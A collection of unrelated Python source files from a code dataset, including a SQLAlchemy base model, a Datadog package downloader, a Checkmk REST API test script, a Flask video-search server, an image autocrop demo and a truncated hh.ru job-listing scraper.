#dict_writer = csv.DictWriter(output_file, keys)
dict_writer = csv.DictWriter(output_file, keys, delimiter=';')
dict_writer.writeheader()
dict_writer.writerows(self.list_dictionary)
| StarcoderdataPython |
1767189 | # Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Author: <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import Column, DateTime
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm import object_mapper
from sqlalchemy.types import CHAR
from designate.openstack.common import timeutils
from designate import exceptions
class Base(object):
__abstract__ = True
__table_initialized__ = False
def save(self, session):
""" Save this object """
session.add(self)
try:
session.flush()
except IntegrityError as e:
non_unique_strings = (
'duplicate entry',
'not unique',
'unique constraint failed'
)
for non_unique_string in non_unique_strings:
if non_unique_string in str(e).lower():
raise exceptions.Duplicate(str(e))
# Not a Duplicate error.. Re-raise.
raise
def delete(self, session):
""" Delete this object """
session.delete(self)
session.flush()
def __setitem__(self, key, value):
setattr(self, key, value)
def __getitem__(self, key):
return getattr(self, key)
def __iter__(self):
columns = dict(object_mapper(self).columns).keys()
# NOTE(russellb): Allow models to specify other keys that can be looked
# up, beyond the actual db columns. An example would be the 'name'
# property for an Instance.
if hasattr(self, '_extra_keys'):
columns.extend(self._extra_keys())
self._i = iter(columns)
return self
def next(self):
n = self._i.next()
return n, getattr(self, n)
def update(self, values):
""" Make the model object behave like a dict """
for k, v in values.iteritems():
setattr(self, k, v)
def iteritems(self):
"""
Make the model object behave like a dict.
Includes attributes from joins.
"""
local = dict(self)
joined = dict([(k, v) for k, v in self.__dict__.iteritems()
if not k[0] == '_'])
local.update(joined)
return local.iteritems()
class SoftDeleteMixin(object):
deleted = Column(CHAR(32), nullable=False, default="0", server_default="0")
deleted_at = Column(DateTime, nullable=True, default=None)
def soft_delete(self, session=None):
""" Mark this object as deleted. """
self.deleted = self.id.replace('-', '')
self.deleted_at = timeutils.utcnow()
if hasattr(self, 'status'):
self.status = "DELETED"
self.save(session=session)
| StarcoderdataPython |
1699866 | # (C) Datadog, Inc. 2019
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
# 1st party.
import argparse
import re
# 3rd party.
from tuf.exceptions import UnknownTargetError
# 2nd party.
# 2nd party.
from .download import REPOSITORY_URL_PREFIX, TUFDownloader
from .exceptions import NonCanonicalVersion, NonDatadogPackage, NoSuchDatadogPackageOrVersion
# Private module functions.
def __is_canonical(version):
'''
https://www.python.org/dev/peps/pep-0440/#appendix-b-parsing-version-strings-with-regular-expressions
'''
P = r'^([1-9]\d*!)?(0|[1-9]\d*)(\.(0|[1-9]\d*))*((a|b|rc)(0|[1-9]\d*))?(\.post(0|[1-9]\d*))?(\.dev(0|[1-9]\d*))?$'
return re.match(P, version) is not None
def __get_wheel_distribution_name(standard_distribution_name):
# https://www.python.org/dev/peps/pep-0491/#escaping-and-unicode
return re.sub('[^\\w\\d.]+', '_', standard_distribution_name, re.UNICODE)
# Public module functions.
def download():
parser = argparse.ArgumentParser()
parser.add_argument(
'standard_distribution_name', type=str, help='Standard distribution name of the desired Datadog check.'
)
parser.add_argument(
'--repository', type=str, default=REPOSITORY_URL_PREFIX, help='The complete URL prefix for the TUF repository.'
)
parser.add_argument('--version', type=str, default=None, help='The version number of the desired Datadog check.')
parser.add_argument(
'-v', '--verbose', action='count', default=0, help='Show verbose information about TUF and in-toto.'
)
args = parser.parse_args()
repository_url_prefix = args.repository
standard_distribution_name = args.standard_distribution_name
version = args.version
verbose = args.verbose
if not standard_distribution_name.startswith('datadog-'):
raise NonDatadogPackage(standard_distribution_name)
else:
wheel_distribution_name = __get_wheel_distribution_name(standard_distribution_name)
tuf_downloader = TUFDownloader(repository_url_prefix=repository_url_prefix, verbose=verbose)
if not version:
version = tuf_downloader.get_latest_version(standard_distribution_name, wheel_distribution_name)
else:
if not __is_canonical(version):
raise NonCanonicalVersion(version)
target_relpath = 'simple/{}/{}-{}-py2.py3-none-any.whl'.format(
standard_distribution_name, wheel_distribution_name, version
)
try:
target_abspath = tuf_downloader.download(target_relpath)
except UnknownTargetError:
raise NoSuchDatadogPackageOrVersion(standard_distribution_name, version)
print(target_abspath) # pylint: disable=print-statement
| StarcoderdataPython |
1752092 | <reponame>tzhanl/azure-sdk-for-python
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class APIKeyRequest(Model):
"""An Application Insights component API Key creation request definition.
:param name: The name of the API Key.
:type name: str
:param linked_read_properties: The read access rights of this API Key.
:type linked_read_properties: list[str]
:param linked_write_properties: The write access rights of this API Key.
:type linked_write_properties: list[str]
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'linked_read_properties': {'key': 'linkedReadProperties', 'type': '[str]'},
'linked_write_properties': {'key': 'linkedWriteProperties', 'type': '[str]'},
}
def __init__(self, *, name: str=None, linked_read_properties=None, linked_write_properties=None, **kwargs) -> None:
super(APIKeyRequest, self).__init__(**kwargs)
self.name = name
self.linked_read_properties = linked_read_properties
self.linked_write_properties = linked_write_properties
| StarcoderdataPython |
45148 | <reponame>bpoje/checkmk-python-rest-api
#!/bin/python3
from Checkmk import *
import re as re
import time
#Init checkmk rest api
def init_checkmk(site_name, cmk_rest_url, cafile, username, secret_token_filename):
# Read secret token from disk
secret_token = open(secret_token_filename,'r').readline().strip('\n')
bearerAuth = [username, secret_token]
cmk = Checkmk(cmk_rest_url,cafile,bearerAuth,site_name)
#print (cmk.server_url())
return cmk
def test_get_host(cmk):
#Get specific host
print('----------------------')
print(' get host:')
print('----------------------')
#host_id = 'dc-awx'
host_id = 'my-test'
host = cmk.host_get(host_id,effective_attributes=True,display_req=False,display_res=False)
if (host != None):
etag = host[1]
host = host[0]
host.output()
print(f'etag: {etag}')
else:
print(f'No host {host_id} found!\n')
def test_get_all_hosts(cmk):
#Get all hosts
print('----------------------')
print(' get all host:')
print('----------------------')
hosts = cmk.host_get_all(display_req=False,display_res=False)
if (hosts != None):
print (f'Number of hosts: {len(hosts)}\n')
#regex search pattern
pattern = re.compile('^.*[A-Z]+.*$', re.UNICODE)
# Output all hosts
for host in hosts:
host.output(1)
# Output all hosts with any upper case letters
#for host in hosts:
# if (pattern.search(host.id) != None):
# host.output(1)
# Output all hosts in linux folder
#for host in hosts:
# if (host.folder.lower() == 'linux'):
# host.output(1)
def test_create_host(cmk):
print('----------------------')
print(' define a host:')
print('----------------------')
#Host that exists
#new_host = Host(id='dc-repo',title='my-test',folder='/linux',ipaddress='10.15.146.250')
#Non existing host using static ip
new_host = Host(id='my-test',title='my-test',folder='/linux',ipaddress='10.15.146.250')
#Non existing host (ip from hostname)
#new_host = Host(id='my-test',title='my-test',folder='/linux')
new_host.output(1)
print('----------------------')
print(' create host:')
print('----------------------')
create_result = cmk.create_host(new_host,send=True,display_req=False,display_res=False)
if (type(create_result.create_return) == Create_fail):
create_result.output(show_header=True)
print('fail')
else:
create_result.output(show_header=True)
print('ok')
def test_activate_changes(cmk, apply_foreign_changes):
print('----------------------')
print(' activate changes:')
print('----------------------')
change_result = cmk.activate_changes(force_foreign_changes=apply_foreign_changes,send=True,display_req=False,display_res=False)
if (type(change_result.changes_return) == Changes_fail):
change_result.output(show_header=False)
print('fail')
else:
change_result.output(show_header=False)
print('ok')
def test_discover_services(cmk):
print('----------------------')
print(' discover services:')
print('----------------------')
new_host = Host(id='my-test',folder='/linux')
# mode is one of the enum values: 'new', 'remove', 'fix_all', 'refresh', 'only_host_labels'
discover_result = cmk.discover_services(new_host,mode='fix_all',send=True,display_req=True,display_res=True)
if (type(discover_result.discover_return) == Discover_fail):
discover_result.output(show_header=True)
print('fail')
else:
discover_result.output(show_header=True)
print('ok')
def test_delete_host(cmk):
# Delete hosts
new_hostx = Host(id='my-test',folder='/linux')
print('----------------------')
print(' delete host:')
print('----------------------')
delete_result = cmk.delete_host(new_hostx,send=True,display_req=False,display_res=False)
if (type(delete_result.delete_return) == Delete_fail):
delete_result.output(show_header=False)
print('fail')
else:
delete_result.output(show_header=False)
print('ok')
def test_get_all_folders(cmk):
print('----------------------')
print(' get all folders:')
print('----------------------')
get_all_folders_result = cmk.get_all_folders('~',recursive=True,show_hosts=True,send=True,display_req=False,display_res=False)
if (type(get_all_folders_result.get_all_folders_return) == GetAllFolders_fail):
get_all_folders_result.output(show_header=True)
print('fail')
else:
get_all_folders_result.output(show_header=True)
print('ok')
def test_get_hosts_in_folder(cmk):
print('----------------------')
print(' get hosts in folder:')
print('----------------------')
folder = '~'
print(f'folder: {folder}')
hosts = cmk.show_all_hosts(folder,send=True,display_req=False,display_res=False)
if (hosts != None):
for host in hosts:
host.output(1)
def test_remove_host_tag(cmk):
print('----------------------')
print(' remove host tag:')
print('----------------------')
update_host = Host(id='my-test',folder='/linux')
tag_group = 'tag_pumpa'
update_result = cmk.remove_host_tag(update_host,tag_group,send=True,display_req=False,display_res=False)
if (type(update_result.update_return) == Update_fail):
update_result.output(show_header=True)
print('fail')
else:
update_result.output(show_header=True)
print('ok')
def test_update_host_tag(cmk):
print('----------------------')
print(' update host tag:')
print('----------------------')
update_host = Host(id='my-test',folder='/linux')
tag_group = 'tag_pumpa'
tag_group_value = 'bs4040'
update_result = cmk.update_host_tag(update_host,tag_group,tag_group_value,send=True,display_req=False,display_res=False)
if (type(update_result.update_return) == Update_fail):
update_result.output(show_header=True)
print('fail')
else:
update_result.output(show_header=True)
print('ok')
#Remove ipaddress (resolve ip from hostname)
def test_remove_host_ipaddress(cmk):
print('----------------------')
print(' remove host ipaddress:')
print('----------------------')
update_host = Host(id='my-test',folder='/linux')
update_result = cmk.remove_host_ipaddress(update_host,send=True,display_req=False,display_res=False)
if (type(update_result.update_return) == Update_fail):
update_result.output(show_header=True)
print('fail')
else:
update_result.output(show_header=True)
print('ok')
def test_update_host_ipaddress(cmk):
print('----------------------')
print(' update host ipaddress:')
print('----------------------')
update_host = Host(id='my-test',folder='/linux')
new_ip='192.168.1.14'
update_result = cmk.update_host_ipaddress(update_host,new_ip,send=True,display_req=False,display_res=False)
if (type(update_result.update_return) == Update_fail):
update_result.output(show_header=True)
print('fail')
else:
update_result.output(show_header=True)
print('ok')
#Update host with custom request body
def test_update_with_body(cmk):
print('----------------------')
print(' update with manual request body:')
print('----------------------')
#Which host to modify?
update_host = Host(id='my-test',folder='/linux')
#New values
new_ip = '192.168.1.123'
tag_group = 'tag_pumpa'
tag_group_value = 'bs0050'
#----------------------------------------------
#Example 1:
# Change checkmk host parameter (don't change other parameters):
# {"update_attributes": {"tag_pumpa": "bs0050"}}
data={}
data['update_attributes'] = {}
data['update_attributes'][tag_group] = tag_group_value
data = js.dumps(data)
#----------------------------------------------
#Example 2:
# Remove checkmk parameter (don't change other parameters):
# {"remove_attributes": ["tag_pumpa_type"]}
#data={}
#data['remove_attributes'] = [ tag_group, ]
#data = js.dumps(data)
#----------------------------------------------
#Example 3:
# Change all checkmk host parameters
# (any parameters not defined in body will be cleared)
# {"attributes": {"ipaddress": "192.168.1.123"}}
#data={}
#data['attributes'] = {}
#data['attributes']['ipaddress'] = new_ip
#data = js.dumps(data)
#----------------------------------------------
#Find etag
etag=cmk.get_etag(update_host)
print(f'etag: {etag}')
print(f'data: {data}')
#Execute update
update_result = cmk.update_host(update_host,data,etag,send=True,display_req=False,display_res=False)
if (type(update_result.update_return) == Update_fail):
update_result.output(show_header=True)
#print(update_result.status_code)
#print(update_result.update_return.title)
#print(update_result.update_return.response_header)
print('fail')
else:
update_result.output(show_header=True)
#print(update_result.status)
print('ok')
# Test
site_name = 'nadzor'
cmk_rest_url = 'https://checkmk.example.com/site1/check_mk/api/1.0'
cafile = 'config/corp_ca.pem'
username = 'automation'
secret_token_filename = f'../config/secret/secret-{site_name}.token'
#Init checkmk rest api
cmk = init_checkmk(site_name, cmk_rest_url, cafile, username, secret_token_filename)
#Example:
#Delete, create "my-test" host in CheckMK, set its tag and activate changes
test_get_host(cmk)
test_delete_host(cmk)
test_activate_changes(cmk,apply_foreign_changes=True)
#test_get_host(cmk)
#test_get_all_hosts(cmk)
test_create_host(cmk)
test_activate_changes(cmk,apply_foreign_changes=True)
test_discover_services(cmk)
#test_delete_host(cmk)
#test_activate_changes(cmk,apply_foreign_changes=True)
#test_get_all_folders(cmk)
#test_get_hosts_in_folder(cmk)
#Changed ip and added tag in examples below:
test_get_host(cmk)
test_update_host_tag(cmk)
test_get_host(cmk)
test_remove_host_ipaddress(cmk)
test_get_host(cmk)
test_update_host_ipaddress(cmk)
test_get_host(cmk)
test_remove_host_tag(cmk)
test_get_host(cmk)
#test_update_with_body(cmk)
test_get_host(cmk)
#Sleep to give server some time to process changes
time.sleep(1)
test_activate_changes(cmk,apply_foreign_changes=True)
#Note: GUI can show pending changes for a while, but should eventually disappear.
#To see changes in web GUI you need to refresh the page.
| StarcoderdataPython |
1618000 | from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class UserRole(models.Model):
role = models.CharField(max_length=100,unique=True)
# desc_chs = models.CharField(max_length=250)
def __unicode__(self):
return self.role
class Profile(models.Model):
user = models.OneToOneField(User,related_name='myprofile')
fullname = models.CharField(max_length=100,null=True,blank=True)
company = models.CharField(max_length=150,null=True,blank=True)
description = models.TextField(default=" ",null=True,blank=True)
logo = models.ImageField(upload_to='profile_images',blank=True)
role = models.ForeignKey(UserRole)
# address = models.CharField(max_length=150)
def __unicode__(self):
return self.user
| StarcoderdataPython |
3353524 | from __future__ import absolute_import, print_function, unicode_literals
from flask import (
Flask,
make_response,
jsonify,
request,
render_template,
send_from_directory,
abort,
redirect,
)
from flask_cors import CORS
from JavPy.functions import Functions
import json
import os
from JavPy.utils.requester import spawn
import JavPy.utils.config as config
import JavPy.utils.buggyauth as auth
from copy import deepcopy
base_path = "/".join(os.path.abspath(__file__).replace("\\", "/").split("/")[:-3])
web_dist_path = base_path + "/app/web/dist"
app = Flask(__name__, template_folder=web_dist_path)
CORS(app, resources=r"/*")
@app.before_first_request
def before_first_request():
pass
@app.before_request
def before_request():
if request.full_path == "/auth_by_password?":
return
if not auth.check_request(request):
abort(400)
@app.route("/auth_by_password", methods=["POST"])
def auth_by_password():
params = json.loads(request.data.decode("utf-8"))
print(params)
if auth.check_password(params["password"]):
cookie = auth.generate_cookie(request)
return cookie
else:
return make_response("auth failed"), 400
@app.route("/get_config", methods=["POST"])
def get_config():
cfg = deepcopy(config.Config.config)
if "password" in cfg:
del cfg["password"]
return json.dumps(cfg)
@app.route("/update_config", methods=["POST"])
def update_config():
data = json.loads(request.data.decode("utf-8"))
if data["password"]:
config.Config.set_config("password", data["password"])
config.Config.set_config("ip-blacklist", data["ipBlacklist"])
config.Config.set_config("ip-whitelist", data["ipWhitelist"])
config.Config.save_config()
try:
import importlib
_reload = importlib.reload
except (ImportError, AttributeError):
_reload = reload
_reload(config)
_reload(auth)
return ""
@app.route("/")
def index():
return render_template("index.html")
@app.route("/<path:path>")
def send_static(path):
if not os.path.exists(web_dist_path + "/" + path):
return render_template("index.html")
else:
return send_from_directory(web_dist_path, path)
@app.route("/search_by_code", methods=["POST"])
def search_by_code():
params = json.loads(request.data.decode("utf-8"))
print(params)
res = {"videos": None, "other": None}
if params["code"]:
try:
res["videos"] = [Functions.search_by_code(params["code"]).to_dict()]
rsp = jsonify(res)
except AttributeError:
rsp = make_response("")
else:
rsp = make_response("")
rsp.headers["Access-Control-Allow-Origin"] = "*"
return rsp
@app.route("/search_by_actress", methods=["POST"])
def search_by_actress():
params = json.loads(request.data.decode("utf-8"))
print(params)
actress = params["actress"]
history_name = params["history_name"] == "true"
briefs, names = spawn(
Functions.search_by_actress, actress, None, history_name
).wait_for_result()
res = {
"videos": [brief.to_dict() for brief in briefs],
"other": {"history_names": names},
}
rsp = jsonify(res)
rsp.headers["Access-Control-Allow-Origin"] = "*"
return rsp
@app.route("/new", methods=["POST"])
def new():
params = json.loads(request.data.decode("utf-8"))
print(params)
if "up_to" in params:
res = Functions.get_newly_released(params["up_to"], False)
elif "page" in params:
res = Functions.get_newly_released(False, params["page"])
else:
res = Functions.get_newly_released(30, False)
if res:
res = [x.to_dict() for x in res]
rsp = jsonify(res)
rsp.headers["Access-Control-Allow-Origin"] = "*"
return rsp
@app.route("/search_magnet_by_code", methods=["POST"])
def search_magnet_by_code():
params = json.loads(request.data.decode("utf-8"))
print(params)
res = []
if params["code"]:
res = Functions.get_magnet(params["code"])
if res:
res = [x.to_dict() for x in res]
rsp = jsonify(res)
rsp.headers["Access-Control-Allow-Origin"] = "*"
return rsp
@app.route("/get_tags", methods=["POST"])
def get_tags():
params = json.loads(request.data.decode("utf-8"))
print(params)
res = Functions.get_tags()
rsp = jsonify(res)
rsp.headers["Access-Control-Allow-Origin"] = "*"
return rsp
@app.route("/actress_info", methods=["POST"])
def actress_info():
params = json.loads(request.data.decode("utf-8"))
print(params)
res = Functions.get_actress_info(params["actress"])
rsp = jsonify(res.to_dict())
print(res)
rsp.headers["Access-Control-Allow-Origin"] = "*"
return rsp
| StarcoderdataPython |
68191 | <reponame>dkazanc/flatsmatch
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 26 2020
Demo to show the capability of autocropping function.
It works to crop 2D projedctions as well as full 3D volumes.
@author: <NAME>
"""
import numpy as np
import matplotlib.pyplot as plt
from larix.methods.misc import AUTOCROP
# Load the 2D projection data (i23 beamline, DLS)
sample_data = np.load('../data/data2D_to_crop.npy')
plt.figure(1)
plt.imshow(sample_data, vmin=0, vmax=1.5, cmap="gray")
plt.title('2D tomographic projection')
plt.show()
print("Runnning autocropping in 2D...")
pars = {'input_data' : sample_data, # input grayscale image
'threshold' : 0.05, # threhsold to control cropping strength
'margin_skip' : 10, # skip number of pixels around the image border
'statbox_size' : 20, # the size of the box to collect background statistics (mean)
'increase_crop' : 20} # increse crop values to ensure better cropping
cropped_indices = AUTOCROP(pars['input_data'], pars['threshold'],\
pars['margin_skip'], pars['statbox_size'],\
pars['increase_crop'])
cropped_im = sample_data[int(cropped_indices[2]):int(cropped_indices[3]),int(cropped_indices[0]):int(cropped_indices[1])]
plt.figure(2)
plt.imshow(cropped_im, vmin=0, vmax=1.5, cmap="gray")
plt.title('cropped 2D projection')
plt.show()
#%% | StarcoderdataPython |
63078 | import datetime
import logging
import random
import re
import time
from typing import Iterator, List, Union, Dict
from urllib.parse import quote
import pandas as pd
import requests
from bs4 import BeautifulSoup
from .conn_postgresql import ConnPostgreSQL
log = logging.getLogger(__name__)
class HhParser:
"""Парсер hh.ru."""
def __init__(self, area: int, search_period: int, search_text: str, search_regex: str) -> None:
"""
:param area: Регион поиска (1 - Москва)
:param search_period: Период поиска в днях
:param search_text: Поисквовый запрос
:param search_regex: Уточняющая регулярка для названия вакансии
"""
self.__area = area
self.__search_period = search_period
self.__search_text = search_text
self.__search_regex = search_regex
self.__base_url = 'https://hh.ru/search/vacancy'
self.__url_params = {
'search_period': self.__search_period,
'clusters': 'true',
'area': self.__area,
'text': quote(self.__search_text),
'enable_snippets': 'true',
'page': 0
}
self.__session = requests.Session()
self.__headers = {
'accept': '*/*',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/76.0.3809.100 Safari/537.36'
}
area = property(lambda self: self.__area)
search_period = property(lambda self: self.__search_period)
search_text = property(lambda self: self.__search_text)
search_regex = property(lambda self: self.__search_regex)
class HhParserResults:
"""Результаты парсинга hh."""
def __init__(self, data: pd.DataFrame) -> None:
"""
:param data: Данные парсинга
"""
self.__data = data
self.area = None
self.search_period = None
self.search_text = None
self.search_regex = None
self.parse_duration = None
self.df_parsing_results = None
self.df_current_jobs = None
self.df_unique_jobs = None
self.df_unique_closed_jobs = None
data = property(lambda self: self.__data)
@staticmethod
def _get_url_with_params(url: str, params: dict) -> str:
"""
Сформируй URL с параметрами.
:param url: URL
:param params: Параметры URL
"""
return f'{url}?' + '&'.join([f'{k}={v}' for k, v in params.items()])
def _get_urls_pages_with_vacancies(self) -> Iterator[str]:
"""Получи URL страниц с вакансиями."""
start_url = self._get_url_with_params(self.__base_url, self.__url_params)
urls = [start_url]
response = self.__exponential_backoff(start_url)
if response is not False:
result = BeautifulSoup(response.content, 'lxml')
pages = result.find_all('a', attrs={'data-qa': 'pager-page'})
page_count = int(pages[-1].text)
url_params = self.__url_params
for i in range(page_count - 1):
url_params['page'] = i + 1
urls.append(self._get_url_with_params(self.__base_url, url_params))
log.info(f'Found {len(urls)} pages with "{self.__search_text}" vacancies')
yield from urls
else:
log.error(f'Start request failed')
raise RuntimeError('Request failed')
def run(self) -> HhParserResults:
"""Запусти парсер."""
time_start = time.monotonic()
log.info(f'Looking for "{self.__search_text}" vacancies on hh.ru...')
vacancies_pages_urls = self._get_urls_pages_with_vacancies()
raw_vacancies_data = []
url_counter = 1
for url in vacancies_pages_urls:
log.info(f'Parsing page {url_counter}...')
response = self.__exponential_backoff(url)
if response is not False:
result = BeautifulSoup(response.content, 'lxml')
vacancies_divs = result.find_all('div', attrs={
'data-qa': 'vacancy-serp__vacancy'
})
premium_vacancies_divs = result.find_all('div', attrs={
'data-qa': 'vacancy-serp__vacancy vacancy-serp__vacancy_premium'
})
vacancies_data = self._get_data_from_divs(vacancies_divs)
premium_vacancies_data = self._get_data_from_divs(premium_vacancies_divs)
raw_vacancies_data += vacancies_data + premium_vacancies_data
else:
log.error(f'Request failed')
raise RuntimeError('Request failed')
url_counter += 1
df = pd.DataFrame(raw_vacancies_data)
if len(df) == 0:
log.error(f'No results found for settings: area={self.__area}, period={self.__search_period}, '
f'text={self.__search_text}, specifying_regex={self.__search_regex}')
raise RuntimeError('No results found')
df['date'] = pd.to_datetime(df['date'], dayfirst=True)
df = df[['date', 'title', 'salary', 'company', 'href']].sort_values(by='date', ascending=False)
parse_duration = round(time.monotonic() - time_start, 2)
log.info(f'Found {len(df)} vacancies in {parse_duration} seconds')
results = self.HhParserResults(df)
results.parse_duration = parse_duration
results.area = self.__area
results.search_period = self.__search_period
results.search_text = self.__search_text
results.search_regex = self.__search_regex
return results
def _vacancy_name_check(self, title: str) -> bool:
"""
Проверь название вакансии уточняющим регулярным выражением.
:param title: Название вакансии
"""
if re.search(self.__search_regex, title, flags=re.IGNORECASE):
return True
return False
@staticmethod
def _process_date(raw_date: str) -> str:
"""
Преобразуй дату публикации вакансии.
:param raw_date: Дата из вакансии
"""
date_dict = {
'января': '01',
'февраля': '02',
'марта': '03',
'апреля': '04',
'мая': '05',
'июня': '06',
'июля': '07',
'августа': '08',
'сентября': '09',
'октября': '10',
'ноября': '11',
'декабря': '12'
}
date_arr = raw_date.split(' ')
for i in range(len(date_arr)):
try:
date_arr[i] = date_dict[date_arr[i]]
except KeyError:
pass
# Добавляем год к дате
date_arr.append(str(datetime.datetime.now().year))
if datetime.datetime.strptime('.'.join(date_arr), '%d.%m.%Y') > datetime.datetime.now():
date_arr[-1] = str(datetime.datetime.now().year - 1)
return '.'.join(date_arr)
def _get_data_from_divs(self, divs: List) -> List[dict]:
"""
Получи данные из блоков с вакансиями.
:param divs: Блоки с вакансиями
"""
results = []
for div in divs:
title = div.find('a', attrs={'data-qa': 'vacancy-serp__vacancy-title'}).text
if not self._vacancy_name_check(title):
continue
company_data = div.find('a', attrs={'data-qa': 'vacancy-serp__vacancy-employer'})
company = company_data.text if company_data else 'Не определено'
href = div.find('a', attrs={'data-qa': 'vacancy-serp__vacancy-title'}).get('href')
date = self._process_date(
div.find('span', attrs={'class': 'vacancy-serp-item__publication-date'}).text.replace('\xa0', ' ')
)
salary_data = div.find('span', attrs={'data-qa': 'vacancy-serp__vacancy-compensation'})
salary = salary_data.text.replace('\xa0', '') if salary_data else 'Не указано'
results.append({'title': title, 'company': company, 'salary': salary, 'date': date, 'href': href})
return results
def __exponential_backoff(self, url: str) -> Union[requests.Response, bool]:
"""
Экспоненциальная выдержка для 403, 500 и 503 ошибки.
:param url: URL запроса
:return: Ответ сервера или False при ошибке
"""
for n in range(0, 5):
log.debug(f'GET request to URL {url}')
response = self.__session.get(url, headers=self.__headers)
if response.status_code in [403, 500, 503]:
log.debug(f'HTTP error: {response.status_code}. Trying again. Attempt {n + 1}')
time.sleep((2 ** n) + random.random())
elif response.status_code == 200:
return response
else:
log.error(f'HTTP error {response.status_code} during requesting URL: {url}')
return False
log.error(f'Failed request URL {url} in 5 attempts')
return False
class HhParserResultsProcessor:
"""Обработка результатов парсинга."""
def __init__(self, hh_parsed_data: HhParser.HhParserResults, pg_conn=ConnPostgreSQL) -> None:
"""
:param hh_parsed_data: Результаты парсинга
:param pg_conn: Активное подключение к PostgreSQL
"""
self.__hh_parsed_data = hh_parsed_data
self.__df = hh_parsed_data.data
self.__parsing_duration = hh_parsed_data.parse_duration
self.__pg_conn = pg_conn
hh_parsed_data = property(lambda self: self.__hh_parsed_data)
report_folder = property(lambda self: self.__report_folder)
def run(self) -> HhParser.HhParserResults:
"""Запусти обработку результатов парсинга."""
self._get_parsing_results_df()
self._get_current_jobs_df()
self._get_unique_jobs_df()
self._get_unique_closed_jobs_df()
return self.__hh_parsed_data
def _find_jobs_without_salary(self) -> Dict[str, Union[int, float]]:
"""Найди % вакансий без указания зарплаты."""
unknown_salary_count = self.__df.loc[self.__df['salary'] == 'Не указано']['salary'].count()
unknown_salary_percent = round((unknown_salary_count / len(self.__df)) * 100, 2)
log.info(f'Jobs without salary: {unknown_salary_percent}%')
return {'jobs_without_salary': unknown_salary_percent}
def _find_salary_mean_and_median(self) -> Dict[str, Union[int, float]]:
"""Найди медианную, среднюю, среднюю максимальную и средней минимальную зарплаты."""
salaries_min = []
salaries_max = []
for i in range(len(self.__df)):
# Указана зарплата "от"
if self.__df.loc[i, 'salary'].split()[0] == 'от':
salaries_min.append(int(self.__df.loc[i, 'salary'].split()[1]))
# Указана зарплата "до"
elif self.__df.loc[i, 'salary'].split()[0] == 'до':
salaries_max.append(int(self.__df.loc[i, 'salary'].split()[1]))
# Указана вилка зарплаты
elif len(self.__df.loc[i, 'salary'].split()[0].split('-')) == 2:
fork = self.__df.loc[i, 'salary'].split()[0].split('-')
salaries_min.append(int(fork[0]))
salaries_max.append(int(fork[1]))
# Зарплата не указана
elif self.__df.loc[i, 'salary'] == 'Не указано':
pass
# Указана фиксированная зарплата
else:
salaries_min.append(int(self.__df.loc[i, 'salary'].split()[0]))
salaries_max.append(int(self.__df.loc[i, 'salary'].split()[0]))
salaries_all = salaries_min + salaries_max
salary_mean = round(pd.Series(salaries_all).mean())
salary_median = round(pd.Series(salaries_all).median())
min_salary_mean = round(pd.Series(salaries_min).mean())
max_salary_mean = round(pd.Series(salaries_max).mean())
log.info(f'Mean salary: {salary_mean}, median salary: {salary_median}, mean min salary: {min_salary_mean}, '
f'mean max salary: {max_salary_mean}')
return {'salary_mean': salary_mean,
'salary_median': salary_median,
'min_salary_mean': min_salary_mean,
'max_salary_mean': max_salary_mean}
def _get_parsing_results_df(self) -> None:
"""Сформируй датафрейм для таблицы "parsing_results"."""
data_for_update = {}
data_for_update.update(self._find_jobs_without_salary())
data_for_update.update(self._find_salary_mean_and_median())
data_for_update.update({'jobs_count': len(self.__df),
'date': datetime.datetime.now().strftime("%Y-%m-%d"),
'time_parse': self.__parsing_duration})
df = pd.DataFrame([data_for_update])
df['date'] = pd.to_datetime(df['date'])
self.__hh_parsed_data.df_parsing_results = df
log.info(f'DataFrame for "parsing_results" table generated')
def _get_current_jobs_df(self) -> None:
"""Сформируй датафрейм для таблицы "current_jobs"."""
min_salary = []
max_salary = []
df = self.__df.copy().reset_index(drop=True)
for i in range(len(df)):
# Указана зарплата "от"
if df.loc[i, 'salary'].split()[0] == 'от':
min_salary.append(int(df.loc[i, 'salary'].split()[1]))
max_salary.append(int(df.loc[i, 'salary'].split()[1]))
# Укащана зарплата "до"
elif df.loc[i, 'salary'].split()[0] == 'до':
min_salary.append(0)
max_salary.append(int(df.loc[i, 'salary'].split()[1]))
# Указана вилка зарплаты
elif len(df.loc[i, 'salary'].split()[0].split('-')) == 2:
fork = df.loc[i, 'salary'].split()[0].split('-')
min_salary.append(int(fork[0]))
max_salary.append(int(fork[1]))
# Зарплата не указана
elif df.loc[i, 'salary'] == 'Не указано':
min_salary.append(0)
max_salary.append(0)
# Указана фиксированная зарплата
else:
min_salary.append(int(df.loc[i, 'salary'].split()[0]))
max_salary.append(int(df.loc[i, 'salary'].split()[0]))
df['min_salary'] = min_salary
df['max_salary'] = max_salary
df['mean_salary'] = (df['min_salary'] + df['max_salary']) / 2
df = df.sort_values(['mean_salary', 'max_salary', 'min_salary'], ascending=False).reset_index(drop=True)
df['row'] = list(range(1, len(df) + 1))
self.__hh_parsed_data.df_current_jobs = df[['row', 'date', 'title', 'company', 'salary', 'href']]
log.info(f'DataFrame for "current_jobs" table generated')
def _get_unique_jobs_merged_df(self) -> pd.DataFrame:
"""Получи сджойненый датафрейм уникальных вакансий из Postgres и результатов парсинга."""
pg_unique_jobs_raw = self.__pg_conn.get_table(table_name='unique_jobs')
pg_unique_jobs = self._get_df_from_pgtable(pg_unique_jobs_raw)
if pg_unique_jobs is None or pg_unique_jobs.empty:
